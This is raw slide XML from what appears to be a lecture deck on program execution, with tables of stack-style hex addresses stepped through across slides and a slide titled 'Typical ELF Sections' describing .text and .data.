              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>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164</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endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x80483f7</a:t>
                      </a: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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="115015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0xfd290</a:t>
            </a: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20344680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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>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165</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endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x80483fa</a:t>
                      </a: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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="140032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32944738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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>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166</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0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x80483fa</a:t>
                      </a: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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="140032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60228588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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>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167</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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x80483fd</a:t>
                      </a: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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="170224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7395262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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>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168</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0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x80483fd</a:t>
                      </a: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3" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4530468" y="170224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89647438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01752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2e0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048423</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>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7"/>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8"/>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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a: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5"/>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169</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd290</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x8048401</a:t>
                      </a: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195240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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299754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8404" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Typical ELF Sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="998457" name="Group 57"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph type="tbl" idx="1"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="228600" y="2171701"/>
          <a:ext cx="8686800" cy="3123725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2171700">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="342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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Name</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Description</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Type</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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>Flags</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571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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.text</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>the program’s code</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>PROGBITS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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>ALLOC and EXECINSTR</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57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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>.data</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
                        <a:t>initialized data</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accent2"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Roboto Light"/>
                          <a:cs typeface="Roboto Light"/>
                        </a:rPr>
